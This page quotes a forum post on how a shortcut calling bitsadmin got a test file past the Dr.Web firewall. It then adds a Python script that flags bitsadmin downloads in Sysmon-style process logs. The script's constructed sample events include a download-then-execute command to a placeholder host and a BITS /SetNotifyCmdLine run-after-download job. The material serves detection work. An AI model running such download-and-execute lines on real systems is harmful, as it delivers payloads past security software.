Will there be a Dr Web Security Space 12?
<blockquote data-quote="509322" data-source="post: 763159"><p>I was able to bypass the Dr Web firewall using a shortcut that calls Bitsadmin to download a file and then execute it. The firewall does not pick up bitsadmin because in Windows it appears that SYSTEM (pid 4) is doing the actual download. I used Winja as the download test file. Now Winja doesn't do anything that is going to provoke Dr Web even when the Prevention (Katana module) is set to Paranoid. The point of the test was to see if I could bypass the firewall only - instead of also bypassing Dr Web's behavior analysis (prevention) by installing Winja.</p><p></p><p>If I set the Dr Web firewall to Ask User for all programs, then I get a firewall alert for SYSTEM when bitsadmin attempts to download the file. A typical user isn't going to get what is happening.</p><p></p><p>In short, Dr Web isn't detecting basic malicious shortcut files. However, all is not lost. Don't get too bent out of shape.</p><p></p><p>If I do the same test using Process Hacker, then Dr Web doesn't block the download, but it does detect and remove the Process Hacker install. Process Hacker is detected as a threat. Why? Because it installs a driver that can be exploited and used as a hack tool. So many AVs detect it. It is good and safe to use for testing.</p><p></p><p>The scan engine will use a high CPU % during a scan. However, that isn't much of a fret as one shouldn't be scanning their entire system all the time.</p><p></p><p>However, disinfection/removal uses high CPU temporarily. I can see people complaining about that.</p><p></p><p>Overall it is decent. It isn't perfect, but it is decent. From what I am seeing, it is quite likeable.</p><p></p><p>It's like most security programs... the user isn't going to know what to expect unless they practice with it. And most importantly, practice with malware.</p></blockquote><p></p>
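The bypass in the post works because a per-program firewall rule never sees bitsadmin.exe make a connection: bitsadmin only enqueues a job, and the transfer itself is carried out by the BITS service inside a svchost.exe host process, which is why the firewall attributes the traffic to a system identity. The practical countermeasure is therefore on the host, in process-creation telemetry, rather than in an outbound rule on bitsadmin.exe. The script below is an added example for this page, not Dr.Web's code or the poster's tooling: it takes Sysmon Event ID 1 style records (Image, ParentImage, CommandLine) flattened to key=value lines, all constructed here, and flags bitsadmin command lines that start a transfer, extracts the remote URL, notes whether execution is chained onto the download (a `&&` after the transfer, or BITS's own /SetNotifyCmdLine) and whether the launch chain comes from explorer.exe, which is what a double-clicked .lnk looks like. Plain `/list`-style enumeration is deliberately not flagged.

```python
"""Flag bitsadmin-driven downloads in process-creation telemetry.

Added example for this page; the sample events are constructed, not real logs.
Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine).
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample events, flattened to key="value" pairs (not real telemetry).
SAMPLE_EVENTS = [
    # 1. Double-clicked .lnk: explorer.exe spawns cmd.exe, whose command line
    #    hands a download job to BITS and then chains execution of the result.
    'Image="C:\\Windows\\System32\\cmd.exe" ParentImage="C:\\Windows\\explorer.exe" '
    'CommandLine="cmd.exe /c bitsadmin /transfer upd /download /priority normal '
    'http://files.example.invalid/winja.exe %TEMP%\\winja.exe && %TEMP%\\winja.exe"',
    # 2. The child bitsadmin.exe process created by event 1 (no chaining visible here).
    'Image="C:\\Windows\\System32\\bitsadmin.exe" ParentImage="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="bitsadmin /transfer upd /download /priority normal '
    'http://files.example.invalid/winja.exe C:\\Users\\u\\AppData\\Local\\Temp\\winja.exe"',
    # 3. Benign admin use: enumerating jobs, no transfer. Must not be flagged.
    'Image="C:\\Windows\\System32\\bitsadmin.exe" '
    'ParentImage="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="bitsadmin /list /allusers /verbose"',
    # 4. BITS-native run-after-download via /SetNotifyCmdLine (no URL on this line).
    'Image="C:\\Windows\\System32\\bitsadmin.exe" ParentImage="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="bitsadmin /SetNotifyCmdLine upd C:\\Users\\u\\AppData\\Local\\Temp\\winja.exe NULL"',
    # 5. The BITS service host itself; the download runs here, but it is not bitsadmin.
    'Image="C:\\Windows\\System32\\svchost.exe" ParentImage="C:\\Windows\\System32\\services.exe" '
    'CommandLine="svchost.exe -k netsvcs -p -s BITS"',
]

KV_RE = re.compile(r'(\w+)="([^"]*)"')
BITSADMIN_RE = re.compile(r"\bbitsadmin(?:\.exe)?\b", re.I)
# Verbs that create, feed, or finish a transfer (as opposed to /list, /info, ...).
TRANSFER_VERBS = ("/transfer", "/addfile", "/resume", "/complete", "/setnotifycmdline")
URL_RE = re.compile(r"""https?://[^\s"'<>&|]+""", re.I)
# An executable invoked after the bitsadmin command on the same shell line.
CHAINED_EXEC_RE = re.compile(
    r"""(?:&&|\|\||;)\s*"?[^&|;"]*?\.(?:exe|bat|cmd|ps1|vbs|js|dll|scr)\b""", re.I
)


@dataclass
class Finding:
    image: str
    parent_image: str
    verbs: list[str]
    urls: list[str]
    chained_exec: bool       # download-then-run on one line, or /SetNotifyCmdLine
    interactive_launch: bool  # parent is explorer.exe: shortcut / double-click chain
    severity: str


def parse_event(line: str) -> dict[str, str]:
    """Turn one key="value" line into a dict."""
    return dict(KV_RE.findall(line))


def analyze(event: dict[str, str]) -> Optional[Finding]:
    """Return a Finding if the command line drives a BITS transfer via bitsadmin."""
    cmd = event.get("CommandLine", "")
    if not BITSADMIN_RE.search(cmd):
        return None
    low = cmd.lower()
    verbs = [v for v in TRANSFER_VERBS if v in low]
    if not verbs:
        return None  # enumeration only; nothing is being fetched
    urls = URL_RE.findall(cmd)
    chained = bool(CHAINED_EXEC_RE.search(cmd)) or "/setnotifycmdline" in low
    parent = event.get("ParentImage", "")
    interactive = parent.lower().endswith("\\explorer.exe")
    if chained:
        severity = "high"
    elif urls:
        severity = "medium"
    else:
        severity = "low"
    return Finding(event.get("Image", ""), parent, verbs, urls, chained, interactive, severity)


def scan(lines: list[str]) -> list[Finding]:
    """Run analyze() over flattened event lines and keep the hits."""
    findings = []
    for line in lines:
        f = analyze(parse_event(line))
        if f is not None:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.image} <- {f.parent_image} verbs={f.verbs} "
              f"urls={f.urls} chained={f.chained_exec} from_explorer={f.interactive_launch}")
```

Against the constructed events this yields three findings: the cmd.exe line launched from explorer.exe (high: transfer plus chained execution), the child bitsadmin.exe transfer (medium: URL but no chaining on that line), and the /SetNotifyCmdLine job (high, even without a URL). Feeding real Sysmon data in only requires mapping the same three fields; the Microsoft-Windows-Bits-Client/Operational log (events 59 and 60, which record the job's URL) is the place to corroborate that the queued transfer actually ran, since the network traffic will show up under the BITS service host rather than under bitsadmin.exe.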